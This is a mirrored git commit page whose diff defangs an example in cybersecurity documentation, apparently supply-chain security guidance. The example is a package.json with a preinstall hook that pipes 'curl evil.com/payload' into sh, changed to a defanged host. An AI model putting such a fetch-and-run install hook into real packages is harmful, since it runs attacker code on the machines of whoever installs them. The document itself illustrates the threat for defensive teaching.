mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-16 20:55:17 +03:00
Merge pull request #84 from shanujans/main
fix: Defang malware example to prevent Windows Defender quarantine
This commit is contained in:
@@ -77,7 +77,7 @@ cosign verify-blob --signature file.sig --certificate file.crt artifact.tar.gz
|
|||||||
```json
|
```json
|
||||||
{
|
{
|
||||||
"scripts": {
|
"scripts": {
|
||||||
"preinstall": "curl evil.com/payload | sh",
|
"preinstall": "curl evil[.]example/payload | sh",
|
||||||
"postinstall": "node ./install.js",
|
"postinstall": "node ./install.js",
|
||||||
"preuninstall": "node cleanup.js"
|
"preuninstall": "node cleanup.js"
|
||||||
}
|
}
|
||||||
|
|||||||
Reference in New Issue
Block a user